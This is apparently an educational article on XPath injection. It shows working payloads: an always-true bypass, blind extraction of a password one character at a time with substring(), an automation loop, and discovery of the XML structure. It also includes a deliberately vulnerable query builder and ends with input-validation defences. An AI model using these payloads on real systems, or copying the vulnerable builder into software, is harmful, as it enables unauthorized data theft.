XPath (XML Path Language) is a language used to query XML documents in order to extract data. XML files are commonly used to store information on the server, particularly configuration settings. Some small applications keep small amounts of data in XML files in order to avoid deploying a full database environment. In that case the stored data is usually not very sensitive, but things get more interesting when the application uses XML documents to store configuration data such as user settings. When user-supplied input is used directly to build an XPath query without being validated, it can be possible to inject expressions in the same way you would exploit an SQL Injection flaw.
Let's see a basic example of how XPath works and how an application can navigate within the XML document to retrieve data. Consider an application that stores information about users in an XML file:
<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
Using XPath you can retrieve any information from within the document (attributes, node text, comments, and so on). For instance, to retrieve the email addresses of every user you can use the following query:
firstname.lastname@example.org email@example.com firstname.lastname@example.org
To extract the BirthDay attribute value for every user:
//users/user/@BirthDay
1990-12-22 1977-03-19 1997-10-03
Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different from the attribute "birthday".
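As a rough illustration of the attribute query and of case sensitivity, here is a minimal sketch using Python's standard xml.etree.ElementTree module. The <users> root element and the self-closing <user> tags are assumptions made so the sample parses. ElementTree implements only a small subset of XPath and cannot return attribute nodes, so the sketch selects the elements and reads the attribute from each one.

```python
import xml.etree.ElementTree as ET

# Attributes are taken from the article; the <users> root and the
# self-closing form of each <user> element are assumptions.
XML = """<users>
  <user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22"/>
  <user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19"/>
  <user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03"/>
</users>"""

root = ET.fromstring(XML)  # root is the <users> element

# Select every <user> child and read its BirthDay attribute.
birthdays = [user.get("BirthDay") for user in root.findall("./user")]
print(birthdays)

# Names are case sensitive: "birthday" does not match "BirthDay",
# so get() finds nothing and returns None for each element.
wrong_case = [user.get("birthday") for user in root.findall("./user")]
print(wrong_case)
```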
To extract the BirthDay attribute value of users with the "user" role:
//users/user[role/text()='user']/@BirthDay
Injecting into XPath
Now that we understand how XPath works, let's see how an attacker could inject arbitrary expressions to retrieve information they should not be able to see. Consider a feature that returns the birth date for a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:
//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay
If the application concatenates user-supplied data into the XPath query string without any validation, an attacker can leave the login empty and send the following role value to manipulate the original query:
role=' or 'a'='a
That will result in the following XPath query:
//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay
1990-12-22 1977-03-19 1997-10-03
Because "and" binds more tightly than "or" in XPath, the predicate is evaluated as (login/text()='' and role/text()='') or 'a'='a'. The "or" term is always true, so the query returns the BirthDay of every user. This is not very useful by itself, but let's see how we can extract more data.
As in SQL, XPath has a substring() function that extracts a subset of characters from a string (positions start at 1). For instance, the following input tests whether the first character of John Rosewood's password is 'A':
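To make the concatenation problem concrete, here is a minimal sketch of how a vulnerable application might assemble the query. The function name build_query is hypothetical; only the query strings themselves come from the text above.

```python
def build_query(login: str, role: str) -> str:
    # Vulnerable on purpose: user input is pasted into the expression
    # without any validation or escaping.
    return (
        "//users/user[login/text()='" + login
        + "' and role/text()='" + role
        + "']/@BirthDay"
    )

# Legitimate request: the input stays inside the quoted string literals.
normal = build_query("jrosewood", "operator")
print(normal)

# Malicious request: the single quote in the role value closes the
# literal early, and the rest of the input becomes part of the predicate.
injected = build_query("", "' or 'a'='a")
print(injected)
```

The second call produces exactly the manipulated query shown above: nothing in the string tells the XPath engine where the developer's expression ends and the attacker's input begins.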
role=operator' and substring(password/text(),1,1)='A' and 'a'='a
The resulting XPath query is now:
//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay
This should not return anything, because the substring() term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's' instead, the query returns his BirthDay, meaning the first character is 's'. Using this technique we can extract the full password by retrieving its characters one by one:
role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a
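The character-by-character extraction can be automated with a simple loop. The sketch below is only a simulation under stated assumptions: oracle() stands in for sending the payload to the application and checking whether a BirthDay comes back, and KNOWN_PREFIX holds just the four characters tested above (the rest of the password is not given in the text). All function names are hypothetical.

```python
import string

# The four characters confirmed by the tests above; in a real attack
# this value is unknown and lives only on the server.
KNOWN_PREFIX = "s3cr"

sent_payloads = []  # record of every role value that would be sent


def build_payload(position: int, guess: str) -> str:
    # Role value that tests one character of the password.
    return (
        f"operator' and substring(password/text(),{position},1)='{guess}'"
        " and 'a'='a"
    )


def oracle(position: int, guess: str) -> bool:
    # Simulated application response: True when a BirthDay would be returned.
    sent_payloads.append(build_payload(position, guess))
    return KNOWN_PREFIX[position - 1:position] == guess


def extract(max_length: int) -> str:
    alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits
    recovered = ""
    for position in range(1, max_length + 1):  # XPath positions start at 1
        for guess in alphabet:
            if oracle(position, guess):
                recovered += guess
                break
        else:
            # No candidate matched: end of string or character outside alphabet.
            break
    return recovered


recovered = extract(4)
print(recovered)
```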
But doesn't this assume you already know the structure of the XML document? That is not an issue: with XPath it is also possible to retrieve tag and attribute names.
In a situation where no information about the XML document structure is known, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:
name(//*)
The name() function returns the name of a node: the context node when called without arguments, or the first node (in document order) of the node-set passed to it. An XML document can only have one root element, and it comes first in document order, so one value is returned: the root tag name. We can now extract the full name the same way we saw before:
role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a
To retrieve an attribute name, the following query could be used:
name(//users/user[position()=1]/@*)
This one needs a bit more explanation. It first navigates to the first <user> element under <users> and then retrieves its first attribute. The position() function returns the index position of the current node (we want the first one). A numeric predicate is a handy shorthand for selecting a node by its index position: [1] is equivalent to [position()=1]. @* selects the attributes of the element, and name() reports the name of the first one in the resulting node-set (note that the order of attributes is implementation-dependent). Let's use this with our attack payload:
role=operator' and substring(name(//users/user[position()=1]/@*),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*),2,1)='d' and 'a'='a
Other useful functions can also be used:
- count(): returns the number of nodes in a node-set (useful to automate the extraction and iterate over position() values without going too far). For example, to check the number of <user> elements:
role=operator' and count(//users/user)=3 and 'a'='a
- string-length(): returns the length of a string (useful to bound the character-by-character extraction with substring()). To check the length of the first attribute name of the first <user> element:
role=operator' and string-length(name(//users/user[position()=1]/@*))=2 and 'a'='a
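The two functions above are typically used to find loop bounds before extracting anything. The following sketch probes increasing numbers until the condition holds. It is a simulation: oracle() is a hypothetical stand-in for the application's true/false behaviour and simply knows the two facts stated above (three <user> elements, a first attribute name of length 2).

```python
def count_payload(path: str, n: int) -> str:
    # Role value that is true when the path selects exactly n nodes.
    return f"operator' and count({path})={n} and 'a'='a"


def length_payload(expr: str, n: int) -> str:
    # Role value that is true when the string has exactly n characters.
    return f"operator' and string-length({expr})={n} and 'a'='a"


FIRST_ATTR_NAME = "name(//users/user[position()=1]/@*)"

# Simulated application: the payloads that would return a BirthDay.
TRUE_PAYLOADS = {
    count_payload("//users/user", 3),
    length_payload(FIRST_ATTR_NAME, 2),
}


def oracle(payload: str) -> bool:
    return payload in TRUE_PAYLOADS


def find_number(make_payload, limit: int = 64):
    # Try 0, 1, 2, ... until the application answers "true".
    for n in range(limit + 1):
        if oracle(make_payload(n)):
            return n
    return None  # nothing matched within the limit


user_count = find_number(lambda n: count_payload("//users/user", n))
name_length = find_number(lambda n: length_payload(FIRST_ATTR_NAME, n))
print(user_count, name_length)
```

With these two numbers known, the position() index and the substring() offset can be iterated without sending requests past the end of the data.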
XPath is a standard language, so the same attack string generally works against any implementation, unlike SQL, where dialects differ between database engines. Also, unlike database objects, access cannot be restricted to parts of an XML document: once the application is authorized to read an XML file, it can access any data within it.
To protect the application against XPath Injection attacks, every user-supplied input must be validated before being used in an XPath query. Unlike SQL, XPath has no universally available equivalent of parameterized queries, although some XPath APIs let you bind variables (referenced as $name in the expression) instead of concatenating strings; prefer that mechanism where it exists. The best approach is "Exact Match" validation, where inputs are compared against a list of known good values (e.g. states or zip codes). If that is not possible, use "White List" validation to accept only known good characters. In general, only alphanumeric characters should be allowed. At a minimum, the following special characters must be rejected:
/ ( ) , = ' [ ] * : and all whitespace
Remember to always reject invalid input outright and send a message back to the user specifying the expected format. Never try to sanitize or substitute the unwanted characters.
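A minimal sketch of both validation styles follows, assuming the login is alphanumeric and the role comes from a short fixed list. The names KNOWN_ROLES, InvalidInput, validate_login and validate_role are hypothetical, and the role list contains only the two roles mentioned in this article.

```python
import re

# "White List" validation: ASCII letters and digits only.
ALLOWED = re.compile(r"[A-Za-z0-9]+")

# "Exact Match" validation: the only role values the application accepts.
KNOWN_ROLES = {"user", "operator"}


class InvalidInput(ValueError):
    """Raised when input is rejected; the message describes the expected format."""


def validate_login(value: str) -> str:
    # fullmatch() requires the whole string to match, so quotes, brackets,
    # whitespace and every other special character cause a rejection.
    if not ALLOWED.fullmatch(value):
        raise InvalidInput("login must contain only letters and digits")
    return value


def validate_role(value: str) -> str:
    if value not in KNOWN_ROLES:
        raise InvalidInput("role must be one of: " + ", ".join(sorted(KNOWN_ROLES)))
    return value


def is_rejected(validator, value: str) -> bool:
    # Small helper for demonstration: True when the validator refuses the value.
    try:
        validator(value)
    except InvalidInput:
        return True
    return False


print(is_rejected(validate_login, "jrosewood"))    # accepted input
print(is_rejected(validate_role, "' or 'a'='a"))   # injection attempt
```

Both validators raise instead of trying to repair the value, in line with the advice above: the input is rejected, never sanitized.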